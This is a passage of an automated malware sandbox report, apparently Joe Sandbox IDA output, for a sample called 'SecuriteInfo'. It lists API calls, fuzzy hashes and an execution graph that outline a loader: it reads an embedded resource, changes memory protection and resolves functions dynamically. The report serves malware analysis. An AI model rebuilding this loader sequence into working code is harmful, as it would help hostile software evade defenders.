                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MetricsObjectReleaseSelectText
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2013942131-0
                                                                                                                                            • Opcode ID: 1bdad9fe24281ba3bf20013684aa38d0675e2e4a7d4c6800ba91628bcb4a5432
                                                                                                                                            • Instruction ID: be9582da4b754445453434a1e3c5d81db51fbb3abe3854a282a6fb6d6835181b
                                                                                                                                            • Opcode Fuzzy Hash: 1bdad9fe24281ba3bf20013684aa38d0675e2e4a7d4c6800ba91628bcb4a5432
                                                                                                                                            • Instruction Fuzzy Hash: F5E0865164357122D69132E96C81BEB7A4D4F426A5F0C1562FE449A3C1DB05C901A7F7
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029F14D8: EnterCriticalSection.KERNEL32(?,029F1515), ref: 029F14DC
                                                                                                                                            • CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,029F23EC,?,00000000,029F2414), ref: 029F2327
                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 029F23C9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                                                                                                                            • String ID: Default
                                                                                                                                            • API String ID: 249151401-753088835
                                                                                                                                            • Opcode ID: 1a5c93d6f573f8e93a36ba00c1b4fdb7d67d3dd42c4ebc53b665d43fb8556e29
                                                                                                                                            • Instruction ID: 107c4a4d464ce52a8be73c03b2828911338354935b3754668b4f1e86c589a889
                                                                                                                                            • Opcode Fuzzy Hash: 1a5c93d6f573f8e93a36ba00c1b4fdb7d67d3dd42c4ebc53b665d43fb8556e29
                                                                                                                                            • Instruction Fuzzy Hash: 4D61AD70E04248DFDB85DFA8C440BDDBBFAAF89704F1884A5E944AB252C7B09E45DB64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ff1c2eab6bc7babd8a6cc7a5fa2d4b08e078f54b114cc54bb75a4dda7081a0c3
                                                                                                                                            • Instruction ID: f9393de339a5318b9747a51e2859068e6aac0ebd27bfd67c6f5a95ced324080e
                                                                                                                                            • Opcode Fuzzy Hash: ff1c2eab6bc7babd8a6cc7a5fa2d4b08e078f54b114cc54bb75a4dda7081a0c3
                                                                                                                                            • Instruction Fuzzy Hash: D2A106677106000BE718AABCEC8437DB3C6DBC4365F28C67EE519CB395EB68C945A790
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,029DA6DA), ref: 029DA672
                                                                                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,029DA6DA), ref: 029DA678
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                                                            • String ID: yyyy
                                                                                                                                            • API String ID: 3303714858-3145165042
                                                                                                                                            • Opcode ID: c22b0417c7eedf16bfce0c4e3d3e5ae2d81aae416a60bd64245ec5bbf50c8a07
                                                                                                                                            • Instruction ID: c2f1ebbe39071490387e89412dbbf47be4e7bbd7aa25fb565cc6171de1b5e379
                                                                                                                                            • Opcode Fuzzy Hash: c22b0417c7eedf16bfce0c4e3d3e5ae2d81aae416a60bd64245ec5bbf50c8a07
                                                                                                                                            • Instruction Fuzzy Hash: 6C217F79A04258DFDB10DFA8C881AEEB7F9EF48700F8184A5E945E7350D7349E50EBA1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Rect$EqualIntersect
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 3291753422-2766056989
                                                                                                                                            • Opcode ID: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
                                                                                                                                            • Instruction ID: d907ce112fbc721940879432bf1453700df0753d9ba3e81a43c0bfeb695cbafe
                                                                                                                                            • Opcode Fuzzy Hash: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
                                                                                                                                            • Instruction Fuzzy Hash: D7118C31A042585BCB11DBACD8C4BDEBBE89F89354F044291ED44DB382DB75D9058BE0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 029FAF86
                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 029FAF98
                                                                                                                                              • Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                            • String ID: MonitorFromPoint
                                                                                                                                            • API String ID: 1792783759-1072306578
                                                                                                                                            • Opcode ID: 6d41847571ec786065d05bb56d6b3e66a100170661d22c5c25a0c009143cbe49
                                                                                                                                            • Instruction ID: 02ca97aed6c3328d445c3a9f5723bea65f481f2fac25ff174e7aef2db68e5d22
                                                                                                                                            • Opcode Fuzzy Hash: 6d41847571ec786065d05bb56d6b3e66a100170661d22c5c25a0c009143cbe49
                                                                                                                                            • Instruction Fuzzy Hash: CC018673A94204AFDB80CE54D848B9A7B66EB84365F414435FB1CEF281D7B1EC568BA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 029FAE61
                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 029FAE6D
                                                                                                                                              • Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                            • String ID: MonitorFromRect
                                                                                                                                            • API String ID: 1792783759-4033241945
                                                                                                                                            • Opcode ID: 577223c6fda2c72f5eb7a26432a35d88e28041ec1e173282dcc5d89f996960fc
                                                                                                                                            • Instruction ID: c92d4a39c9224c75de280e63b47aedd7baee62d4568b7dd190294bbd1506f3e0
                                                                                                                                            • Opcode Fuzzy Hash: 577223c6fda2c72f5eb7a26432a35d88e28041ec1e173282dcc5d89f996960fc
                                                                                                                                            • Instruction Fuzzy Hash: 7B01AD32A802049BD7E0CE14D98CB16BB69EB80360F048941EAA9EB242D774EC41CFA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetSystemMetrics.USER32(?), ref: 029FADEA
                                                                                                                                              • Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23
                                                                                                                                            • GetSystemMetrics.USER32(?), ref: 029FADB0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                            • String ID: GetSystemMetrics
                                                                                                                                            • API String ID: 1792783759-96882338
                                                                                                                                            • Opcode ID: 8730236609e13fa4c533348385c7092d7d7156edc31c0698792731093367b5c8
                                                                                                                                            • Instruction ID: e865129d4da901808d4ab0a6816f7e0b1070b4c64fde6d597c56e4949f934a95
                                                                                                                                            • Opcode Fuzzy Hash: 8730236609e13fa4c533348385c7092d7d7156edc31c0698792731093367b5c8
                                                                                                                                            • Instruction Fuzzy Hash: B6F09A729942015FCBD08A38D9C8326356AEF85336F818E21E31E8A1D6DF3D8852C720
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetKeyState.USER32(00000010), ref: 02A03203
                                                                                                                                            • GetKeyState.USER32(00000011), ref: 02A03214
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: State
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1649606143-3916222277
                                                                                                                                            • Opcode ID: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
                                                                                                                                            • Instruction ID: 41dc433954b2d37bee365e7aa39b44893a3a7267a257fdc8d816d5b911f1324c
                                                                                                                                            • Opcode Fuzzy Hash: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
                                                                                                                                            • Instruction Fuzzy Hash: 26E0D1167407C132FE1275547E803D7D7D24F767B8F0885E6FFD4191C1DA850511A1A1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02A28C5C
                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02A28C8C
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000008), ref: 02A28CAB
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 02A28CB7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Read$Write
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3448952669-0
                                                                                                                                            • Opcode ID: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
                                                                                                                                            • Instruction ID: 7b8db43fc89b775ec3f33279bd4af7537f5ad10d2e7909948c8dd9643b45f0f4
                                                                                                                                            • Opcode Fuzzy Hash: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
                                                                                                                                            • Instruction Fuzzy Hash: D621ACB16426299FDF10CF69DD80BAE73A9EF80321F008551FE10A7384DB3CE8158AA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:9.9%
                                                                                                                                            Dynamic/Decrypted Code Coverage:38.4%
                                                                                                                                            Signature Coverage:10.3%
                                                                                                                                            Total number of Nodes:437
                                                                                                                                            Total number of Limit Nodes:47
                                                                                                                                            execution_graph 56302 3015d044 56303 3015d05c 56302->56303 56304 3015d0b6 56303->56304 56309 360b1db8 56303->56309 56313 360b0824 56303->56313 56321 360b6551 56303->56321 56329 360b1dc8 56303->56329 56310 360b1dee 56309->56310 56311 360b0824 CallWindowProcW 56310->56311 56312 360b1e0f 56311->56312 56312->56304 56314 360b082f 56313->56314 56315 360b65e1 56314->56315 56317 360b65d1 56314->56317 56318 360b65df 56315->56318 56341 360b5504 56315->56341 56317->56318 56333 360b6708 56317->56333 56337 360b66f8 56317->56337 56322 360b6575 56321->56322 56323 360b65e1 56322->56323 56325 360b65d1 56322->56325 56324 360b5504 CallWindowProcW 56323->56324 56326 360b65df 56323->56326 56324->56326 56325->56326 56327 360b66f8 CallWindowProcW 56325->56327 56328 360b6708 CallWindowProcW 56325->56328 56327->56326 56328->56326 56330 360b1dee 56329->56330 56331 360b0824 CallWindowProcW 56330->56331 56332 360b1e0f 56331->56332 56332->56304 56335 360b670b 56333->56335 56334 360b5504 CallWindowProcW 56334->56335 56335->56334 56336 360b67f2 56335->56336 56336->56318 56338 360b6702 56337->56338 56339 360b5504 CallWindowProcW 56338->56339 56340 360b67f2 56338->56340 56339->56338 56340->56318 56342 360b550f 56341->56342 56343 360b68a2 CallWindowProcW 56342->56343 56344 360b6851 56342->56344 56343->56344 56344->56318 55913 360b5728 55914 360b576e GetCurrentProcess 55913->55914 55916 360b57b9 55914->55916 55917 360b57c0 GetCurrentThread 55914->55917 55916->55917 55918 360b57fd GetCurrentProcess 55917->55918 55919 360b57f6 55917->55919 55920 360b5833 55918->55920 55919->55918 55921 360b585b GetCurrentThreadId 55920->55921 55922 360b588c 55921->55922 55923 31b40890 55924 31b408b1 55923->55924 55925 31b4097a 55924->55925 55927 31b43b9b 55924->55927 55930 31b493b0 55927->55930 55932 31b493c3 55930->55932 55934 31b49460 55932->55934 55935 31b494a8 VirtualProtect 55934->55935 55937 31b43bbd 55935->55937 55938 40cbf7 55939 40cc08 55938->55939 55979 40d534 HeapCreate 55939->55979 55942 40cc46 55981 41087e GetModuleHandleW 55942->55981 55946 40cc57 __RTC_Initialize 56015 411a15 55946->56015 55949 40cc66 55950 40cc72 GetCommandLineA 55949->55950 56127 40e79a 62 API calls 3 library calls 55949->56127 56030 412892 55950->56030 55953 40cc71 55953->55950 55956 40cc8c 55957 40cc90 55956->55957 55958 40cc98 55956->55958 56129 40e79a 62 API calls 3 library calls 55957->56129 56055 41255f 55958->56055 55961 40cc97 55961->55958 55963 40cca1 56130 40e79a 62 API calls 3 library calls 55963->56130 55964 40cca9 56070 40e859 73 API calls 5 library calls 55964->56070 55967 40cca8 55967->55964 55968 40ccb0 55969 40ccb5 55968->55969 55970 40ccbc 55968->55970 56131 40e79a 62 API calls 3 library calls 55969->56131 56071 4019f0 OleInitialize 55970->56071 55973 40ccbb 55973->55970 55974 40ccd8 55975 40ccea 55974->55975 56132 40ea0a 62 API calls _doexit 55974->56132 56133 40ea36 62 API calls _doexit 55975->56133 55978 40ccef _getenv 55980 40cc3a 55979->55980 55980->55942 56125 40cbb4 62 API calls 3 library calls 55980->56125 55982 410892 55981->55982 55983 410899 55981->55983 56134 40e76a Sleep GetModuleHandleW 55982->56134 55985 410a01 55983->55985 55986 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 55983->55986 56150 410598 7 API calls __decode_pointer 55985->56150 55987 4108ec TlsAlloc 55986->55987 55991 40cc4c 55987->55991 55992 41093a TlsSetValue 55987->55992 55989 410898 55989->55983 55991->55946 56126 40cbb4 62 API calls 3 library calls 55991->56126 55992->55991 55993 41094b 55992->55993 56135 40ea54 6 API calls 4 library calls 55993->56135 55995 410950 56136 41046e 6 API calls __crt_waiting_on_module_handle 55995->56136 55997 41095b 56137 41046e 6 API calls __crt_waiting_on_module_handle 55997->56137 55999 41096b 56138 41046e 6 API calls __crt_waiting_on_module_handle 55999->56138 56001 41097b 56139 41046e 6 API calls __crt_waiting_on_module_handle 56001->56139 56003 41098b 56140 40d564 InitializeCriticalSectionAndSpinCount __ioinit 56003->56140 56005 410998 56005->55985 56141 4104e9 6 API calls __crt_waiting_on_module_handle 56005->56141 56007 4109ac 56007->55985 56142 411cba 56007->56142 56011 4109df 56011->55985 56012 4109e6 56011->56012 56149 4105d5 62 API calls 5 library calls 56012->56149 56014 4109ee GetCurrentThreadId 56014->55991 56170 40e1d8 56015->56170 56017 411a21 GetStartupInfoA 56018 411cba __calloc_crt 62 API calls 56017->56018 56020 411a42 56018->56020 56019 411c60 _getenv 56019->55949 56020->56019 56021 411ba7 56020->56021 56024 411cba __calloc_crt 62 API calls 56020->56024 56026 411b2a 56020->56026 56021->56019 56022 411bdd GetStdHandle 56021->56022 56023 411c42 SetHandleCount 56021->56023 56025 411bef GetFileType 56021->56025 56172 41389c InitializeCriticalSectionAndSpinCount _getenv 56021->56172 56022->56021 56023->56019 56024->56020 56025->56021 56026->56019 56026->56021 56027 411b53 GetFileType 56026->56027 56171 41389c InitializeCriticalSectionAndSpinCount _getenv 56026->56171 56027->56026 56031 4128b0 GetEnvironmentStringsW 56030->56031 56038 4128cf 56030->56038 56032 4128b8 56031->56032 56034 4128c4 GetLastError 56031->56034 56035 4128eb GetEnvironmentStringsW 56032->56035 56036 4128fa WideCharToMultiByte 56032->56036 56033 412968 56037 412971 GetEnvironmentStrings 56033->56037 56039 40cc82 56033->56039 56034->56038 56035->56036 56035->56039 56042 41295d FreeEnvironmentStringsW 56036->56042 56043 41292e 56036->56043 56037->56039 56040 412981 56037->56040 56038->56032 56038->56033 56128 4127d7 107 API calls 3 library calls 56039->56128 56044 411c75 __malloc_crt 62 API calls 56040->56044 56042->56039 56173 411c75 56043->56173 56046 41299b 56044->56046 56048 4129a2 FreeEnvironmentStringsA 56046->56048 56049 4129ae ___crtGetEnvironmentStringsA 56046->56049 56048->56039 56052 4129b8 FreeEnvironmentStringsA 56049->56052 56050 41293c WideCharToMultiByte 56051 41294e 56050->56051 56054 412956 56050->56054 56179 40b6b5 62 API calls 2 library calls 56051->56179 56052->56039 56054->56042 56056 412568 56055->56056 56058 41256d _strlen 56055->56058 56207 41446b 106 API calls __setmbcp 56056->56207 56059 411cba __calloc_crt 62 API calls 56058->56059 56062 40cc9d 56058->56062 56065 4125a2 _strlen 56059->56065 56060 412600 56210 40b6b5 62 API calls 2 library calls 56060->56210 56062->55963 56062->55964 56063 411cba __calloc_crt 62 API calls 56063->56065 56064 412626 56211 40b6b5 62 API calls 2 library calls 56064->56211 56065->56060 56065->56062 56065->56063 56065->56064 56068 4125e7 56065->56068 56208 40ef42 62 API calls __fptostr 56065->56208 56068->56065 56209 40e61c 10 API calls 3 library calls 56068->56209 56070->55968 56072 401ab9 56071->56072 56212 40b99e 56072->56212 56074 401abf 56075 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 56074->56075 56104 402467 56074->56104 56076 401dc3 FindCloseChangeNotification GetModuleHandleA 56075->56076 56083 401c55 56075->56083 56225 401650 56076->56225 56078 401e8b FindResourceA LoadResource LockResource SizeofResource 56079 40b84d _malloc 62 API calls 56078->56079 56080 401ebf 56079->56080 56227 40af66 56080->56227 56082 401c9c CloseHandle 56082->55974 56083->56082 56088 401cf9 Module32Next 56083->56088 56084 401ecb _memset 56085 401efc SizeofResource 56084->56085 56086 401f1c 56085->56086 56087 401f5f 56085->56087 56086->56087 56265 401560 __VEC_memcpy __fptostr 56086->56265 56090 401f92 _memset 56087->56090 56266 401560 __VEC_memcpy __fptostr 56087->56266 56088->56076 56097 401d0f 56088->56097 56092 401fa2 FreeResource 56090->56092 56093 40b84d _malloc 62 API calls 56092->56093 56094 401fbb SizeofResource 56093->56094 56095 401fe5 _memset 56094->56095 56096 4020aa LoadLibraryA 56095->56096 56098 401650 56096->56098 56097->56082 56100 401dad Module32Next 56097->56100 56099 40216c GetProcAddress 56098->56099 56101 4021aa 56099->56101 56099->56104 56100->56076 56100->56097 56101->56104 56239 4018f0 56101->56239 56104->55974 56105 4021f1 56124 40243f 56105->56124 56251 401870 56105->56251 56107 402269 VariantInit 56108 401870 75 API calls 56107->56108 56109 40228b VariantInit 56108->56109 56110 4022a7 56109->56110 56111 4022d9 SafeArrayCreate SafeArrayAccessData 56110->56111 56256 40b350 56111->56256 56114 40232c 56115 402354 SafeArrayDestroy 56114->56115 56116 40235b 56114->56116 56115->56116 56117 402392 SafeArrayCreateVector 56116->56117 56118 4023a4 56117->56118 56119 4023bc VariantClear VariantClear 56118->56119 56258 4019a0 56119->56258 56122 40242e 56123 4019a0 65 API calls 56122->56123 56123->56124 56124->56104 56267 40b6b5 62 API calls 2 library calls 56124->56267 56125->55942 56126->55946 56127->55953 56128->55956 56129->55961 56130->55967 56131->55973 56132->55975 56133->55978 56134->55989 56135->55995 56136->55997 56137->55999 56138->56001 56139->56003 56140->56005 56141->56007 56145 411cc3 56142->56145 56144 4109c5 56144->55985 56148 4104e9 6 API calls __crt_waiting_on_module_handle 56144->56148 56145->56144 56146 411ce1 Sleep 56145->56146 56151 40e231 56145->56151 56147 411cf6 56146->56147 56147->56144 56147->56145 56148->56011 56149->56014 56152 40e23d _getenv 56151->56152 56153 40e255 56152->56153 56163 40e274 _memset 56152->56163 56164 40bfc1 62 API calls __getptd_noexit 56153->56164 56155 40e25a 56165 40e744 6 API calls 2 library calls 56155->56165 56157 40e2e6 RtlAllocateHeap 56157->56163 56160 40e26a _getenv 56160->56145 56163->56157 56163->56160 56166 40d6e0 62 API calls 2 library calls 56163->56166 56167 40def2 5 API calls 2 library calls 56163->56167 56168 40e32d LeaveCriticalSection _doexit 56163->56168 56169 40d2e3 6 API calls __decode_pointer 56163->56169 56164->56155 56166->56163 56167->56163 56168->56163 56169->56163 56170->56017 56171->56026 56172->56021 56176 411c7e 56173->56176 56175 411cb4 56175->56042 56175->56050 56176->56175 56177 411c95 Sleep 56176->56177 56180 40b84d 56176->56180 56178 411caa 56177->56178 56178->56175 56178->56176 56179->56054 56181 40b900 56180->56181 56191 40b85f 56180->56191 56205 40d2e3 6 API calls __decode_pointer 56181->56205 56183 40b906 56206 40bfc1 62 API calls __getptd_noexit 56183->56206 56188 40b8bc RtlAllocateHeap 56188->56191 56189 40b870 56189->56191 56198 40ec4d 62 API calls 2 library calls 56189->56198 56199 40eaa2 62 API calls 7 library calls 56189->56199 56200 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 56189->56200 56191->56188 56191->56189 56192 40b8ec 56191->56192 56195 40b8f1 56191->56195 56197 40b8f8 56191->56197 56201 40b7fe 62 API calls 4 library calls 56191->56201 56202 40d2e3 6 API calls __decode_pointer 56191->56202 56203 40bfc1 62 API calls __getptd_noexit 56192->56203 56204 40bfc1 62 API calls __getptd_noexit 56195->56204 56197->56176 56198->56189 56199->56189 56201->56191 56202->56191 56203->56195 56204->56197 56205->56183 56206->56197 56207->56058 56208->56065 56209->56068 56210->56062 56211->56062 56214 40b9aa _getenv _strnlen 56212->56214 56213 40b9b8 56268 40bfc1 62 API calls __getptd_noexit 56213->56268 56214->56213 56217 40b9ec 56214->56217 56216 40b9bd 56269 40e744 6 API calls 2 library calls 56216->56269 56270 40d6e0 62 API calls 2 library calls 56217->56270 56220 40b9f3 56271 40b917 120 API calls 3 library calls 56220->56271 56222 40b9ff 56272 40ba18 LeaveCriticalSection _doexit 56222->56272 56223 40b9cd _getenv 56223->56074 56226 4017cc ___crtGetEnvironmentStringsA 56225->56226 56226->56078 56229 40af70 56227->56229 56228 40b84d _malloc 62 API calls 56228->56229 56229->56228 56230 40af8a 56229->56230 56234 40af8c std::bad_alloc::bad_alloc 56229->56234 56273 40d2e3 6 API calls __decode_pointer 56229->56273 56230->56084 56233 40afbc 56276 40cd39 RaiseException 56233->56276 56237 40afb2 56234->56237 56274 40d2bd 73 API calls __cinit 56234->56274 56275 40af49 62 API calls std::exception::exception 56237->56275 56238 40afca 56240 401903 lstrlenA 56239->56240 56241 4018fc 56239->56241 56277 4017e0 56240->56277 56241->56105 56244 401940 GetLastError 56246 40194b MultiByteToWideChar 56244->56246 56247 40198d 56244->56247 56245 401996 56245->56105 56248 4017e0 77 API calls 56246->56248 56247->56245 56293 401030 GetLastError EntryPoint 56247->56293 56249 401970 MultiByteToWideChar 56248->56249 56249->56247 56252 40af66 74 API calls 56251->56252 56253 40187c 56252->56253 56254 401885 SysAllocString 56253->56254 56255 4018a4 56253->56255 56254->56255 56255->56107 56257 40231a SafeArrayUnaccessData 56256->56257 56257->56114 56259 4019aa InterlockedDecrement 56258->56259 56264 4019df VariantClear 56258->56264 56260 4019b8 56259->56260 56259->56264 56261 4019c2 SysFreeString 56260->56261 56263 4019c9 56260->56263 56260->56264 56261->56263 56297 40aec0 63 API calls 2 library calls 56263->56297 